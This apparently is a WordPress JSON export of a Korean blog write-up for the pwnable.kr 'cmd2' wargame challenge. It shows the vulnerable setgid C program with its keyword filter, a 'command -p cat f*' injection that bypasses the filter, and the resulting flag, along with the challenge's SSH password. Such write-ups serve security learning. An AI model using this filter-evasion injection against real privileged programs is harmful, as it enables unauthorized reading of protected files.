{"id":3265,"date":"2025-04-10T18:53:15","date_gmt":"2025-04-10T09:53:15","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3265"},"modified":"2025-04-10T18:53:53","modified_gmt":"2025-04-10T09:53:53","slug":"cmd2","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3265","title":{"rendered":"cmd2"},"content":{"rendered":"\n<h1 class=\"wp-block-heading\">Description<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">Daddy bought me a system command shell.\nbut he put some filters to prevent me from playing with it without his permission...\nbut I wanna play anytime I want!\n\nssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)\npw: PATH_environment?_Now_I_really_g3t_it,_mommy!<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Source Code<\/h1>\n\n\n\n<p>\ubaa8\ub4e0 \ud658\uacbd \ubcc0\uc218\ub97c \uc9c0\uc6cc\ubc84\ub9ac\uace0, <code>putenv(\"PATH=\/no_command_execution_until_you_become_a_hacker\");<\/code> \ucf54\ub4dc\ub85c PATH \ud658\uacbd \ubcc0\uc218\ub97c \uc81c\ud55c\ub41c \uac12\uc73c\ub85c \uc124\uc815\ud558\uace0, <code>filter<\/code> \ud568\uc218\uc5d0\uc11c \uba85\ub839\uc5b4 \ub0b4\uc5d0 <code>\"=\"<\/code>, <code>\"PATH\"<\/code>, <code>\"export\"<\/code>, <code>\"\/\"<\/code>, <code>\"<\/code>&#8220;<code>\ubc0f<\/code>&#8220;flag&#8221;` \uac19\uc740 \ubb38\uc790\uc5f4\uc774 \uc788\uc73c\uba74 \uc2e4\ud589\uc744 \uc911\ub2e8\uc2dc\ud0a8\ub2e4.<\/p>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"c\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">#include &lt;stdio.h>\n#include &lt;string.h>\n\nint filter(char* cmd){\n\tint r=0;\n\tr += strstr(cmd, \"=\")!=0;\n\tr += strstr(cmd, \"PATH\")!=0;\n\tr += strstr(cmd, \"export\")!=0;\n\tr += strstr(cmd, \"\/\")!=0;\n\tr += strstr(cmd, \"`\")!=0;\n\tr += strstr(cmd, \"flag\")!=0;\n\treturn r;\n}\n\nextern char** environ;\nvoid delete_env(){\n\tchar** p;\n\tfor(p=environ; *p; p++)\tmemset(*p, 0, strlen(*p));\n}\n\nint main(int argc, char* argv[], char** envp){\n\tdelete_env();\n\tputenv(\"PATH=\/no_command_execution_until_you_become_a_hacker\");\n\tif(filter(argv[1])) return 0;\n\tprintf(\"%s\\n\", argv[1]);\n\tsetregid(getegid(), getegid());\n\tsystem( argv[1] );\n\treturn 0;\n}<\/pre>\n\n\n\n<h1 class=\"wp-block-heading\">Solution<\/h1>\n\n\n\n<p>\ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc788\uaca0\uc9c0\ub9cc, \uac04\ub2e8\ud558\uac8c <code>PATH<\/code> \ud658\uacbd\ubcc0\uc218 \uc0c1\uad00\uc5c6\uc774 <code>command<\/code> \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4.<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Result<\/h1>\n\n\n\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"raw\" data-enlighter-theme=\"dracula\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">cmd2@ubuntu:~$ .\/cmd2 'command -p cat f*'\ncommand -p cat f*\nShell_variables_can_be_quite_fun_to_play_with!<\/pre>\n","protected":false},"excerpt":{"rendered":"<p>Description Source Code \ubaa8\ub4e0 \ud658\uacbd \ubcc0\uc218\ub97c \uc9c0\uc6cc\ubc84\ub9ac\uace0, putenv(&#8220;PATH=\/no_command_execution_until_you_become_a_hacker&#8221;); \ucf54\ub4dc\ub85c PATH \ud658\uacbd \ubcc0\uc218\ub97c \uc81c\ud55c\ub41c \uac12\uc73c\ub85c \uc124\uc815\ud558\uace0, filter \ud568\uc218\uc5d0\uc11c \uba85\ub839\uc5b4 \ub0b4\uc5d0 &#8220;=&#8221;, &#8220;PATH&#8221;, &#8220;export&#8221;, &#8220;\/&#8221;, &#8220;&#8220;\ubc0f&#8220;flag&#8221;` \uac19\uc740 \ubb38\uc790\uc5f4\uc774 \uc788\uc73c\uba74 \uc2e4\ud589\uc744 \uc911\ub2e8\uc2dc\ud0a8\ub2e4. Solution \ub2e4\uc591\ud55c \ubc29\ubc95\uc774 \uc788\uaca0\uc9c0\ub9cc, \uac04\ub2e8\ud558\uac8c PATH \ud658\uacbd\ubcc0\uc218 \uc0c1\uad00\uc5c6\uc774 command \uba85\ub839\uc5b4\ub97c \ud1b5\ud574 \uc6b0\ud68c\ud560 \uc218 \uc788\uc5c8\ub2e4. Result<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"neve_meta_sidebar":"","neve_meta_container":"","neve_meta_enable_content_width":"","neve_meta_content_width":0,"neve_meta_title_alignment":"","neve_meta_author_avatar":"","neve_post_elements_order":"","neve_meta_disable_header":"","neve_meta_disable_footer":"","neve_meta_disable_title":"","footnotes":""},"categories":[4],"tags":[25],"class_list":["post-3265","post","type-post","status-publish","format-standard","hentry","category-pwnable-kr","tag-pwnable"],"_links":{"self":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3265"}],"version-history":[{"count":1,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions"}],"predecessor-version":[{"id":3266,"href":"https:\/\/h4ck.kr\/index.php?rest_route=\/wp\/v2\/posts\/3265\/revisions\/3266"}],"wp:attachment":[{"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3265"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3265"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/h4ck.kr\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3265"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}